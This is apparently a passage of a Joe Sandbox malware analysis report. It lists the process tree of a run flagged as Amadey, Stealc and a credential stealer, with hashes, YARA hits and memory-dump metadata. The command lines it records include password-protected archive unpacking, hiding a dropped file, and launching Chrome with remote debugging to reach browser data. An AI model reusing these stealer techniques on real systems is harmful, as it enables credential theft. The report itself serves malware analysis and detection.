Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2773670606.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2774094257.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:16:37
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe"
Imagebase:	0x530000
File size:	439'296 bytes
MD5 hash:	51FF79B406CB223DD49DD4C947EC97B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	20:16:38
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Imagebase:	0xaa0000
File size:	439'296 bytes
MD5 hash:	51FF79B406CB223DD49DD4C947EC97B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	20:16:39
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
Imagebase:	0xaa0000
File size:	439'296 bytes
MD5 hash:	51FF79B406CB223DD49DD4C947EC97B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	20:16:44
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe"
Imagebase:	0x7ff7358f0000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 63%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	20:16:45
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
Imagebase:	0x7ff7358f0000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	20:16:55
Start date:	21/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff70ef80000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	20:16:56
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe"
Imagebase:	0x580000
File size:	4'470'272 bytes
MD5 hash:	A42B5A11FB98E17DCA2EA358EAC541DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	20:16:58
Start date:	21/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff70ef80000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	20:17:08
Start date:	21/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff70ef80000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	20:17:09
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe"
Imagebase:	0x8a0000
File size:	4'433'408 bytes
MD5 hash:	17830E6496A4FA2D4DC73BA36CE61725
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	20:17:16
Start date:	21/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff70ef80000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	20:17:22
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe"
Imagebase:	0x400000
File size:	4'438'776 bytes
MD5 hash:	3A425626CBD40345F5B8DDDD6B2B9EFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 87%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	20:17:27
Start date:	21/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff743ce0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	20:17:28
Start date:	21/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	20:17:28
Start date:	21/12/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff67b590000
File size:	33'280 bytes
MD5 hash:	BEA7464830980BF7C0490307DB4FC875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	20:17:28
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Imagebase:	0x100000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	20:17:29
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_7.zip -oextracted
Imagebase:	0x100000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	20:17:29
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_6.zip -oextracted
Imagebase:	0x100000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	20:17:30
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe"
Imagebase:	0x400000
File size:	1'959'936 bytes
MD5 hash:	63941836D5C054B13AE7B96F743C38CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	20:17:31
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_5.zip -oextracted
Imagebase:	0x100000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	20:17:32
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_4.zip -oextracted
Imagebase:	0x100000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	20:17:37
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_3.zip -oextracted
Imagebase:	0x100000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	20:17:39
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"
Imagebase:	0xec0000
File size:	1'845'760 bytes
MD5 hash:	F417402BF33D99A0AF654DFBF7042087
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	20:17:41
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	20:17:44
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	20:17:44
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	20:17:45
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,12670110117547472489,9919710974034133825,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	20:17:45
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2004,i,2036866093412023983,10134248747286953754,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	20:17:49
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_2.zip -oextracted
Imagebase:	0x100000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	20:17:50
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe"
Imagebase:	0x360000
File size:	2'955'776 bytes
MD5 hash:	F853C23F7A2641FEB4E4B94F59728314
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002B.00000003.3493806478.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	20:17:57
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"
Imagebase:	0xec0000
File size:	1'845'760 bytes
MD5 hash:	F417402BF33D99A0AF654DFBF7042087
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	20:17:58
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe"
Imagebase:	0x5e0000
File size:	965'120 bytes
MD5 hash:	58F6FD6BFBBB99454234A6099D39E954
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	20:18:04
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	20:18:04
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	20:18:05
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2328,i,6628927633879078987,5168946575575726865,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	20:18:05
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	20:18:06
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_1.zip -oextracted
Imagebase:	0x100000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	20:18:07
Start date:	21/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	20:18:08
Start date:	21/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H "in.exe"
Imagebase:	0x7ff6727b0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	20:18:08
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\in.exe
Wow64 process (32bit):	false
Commandline:	"in.exe"
Imagebase:	0x7ff7aac30000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	753
Total number of Limit Nodes:	16

Executed Functions

Function 0088652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,0088652A,?,?,?,?,?,00887661), ref: 00886567

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ee71e70ee60ec51182ebc4dd07fc6e56e7539ffa182e34e95e6eec79ce17e5b7
Instruction ID: 4f6252f90db60b11818326ea4e2c767815ad0642771be73de4a0d35f8f728181
Opcode Fuzzy Hash: ee71e70ee60ec51182ebc4dd07fc6e56e7539ffa182e34e95e6eec79ce17e5b7
Instruction Fuzzy Hash: 92E08C30140648AECF257B18DC5DE8C3B69FF61782F140801FD189A226DB25EE91CB81

Function 00855C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000422, xrefs: 008560C9
00000423, xrefs: 008560FA
0000043f, xrefs: 0085612B
00000419, xrefs: 00856098
Keyboard Layout\Preload, xrefs: 00856054

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
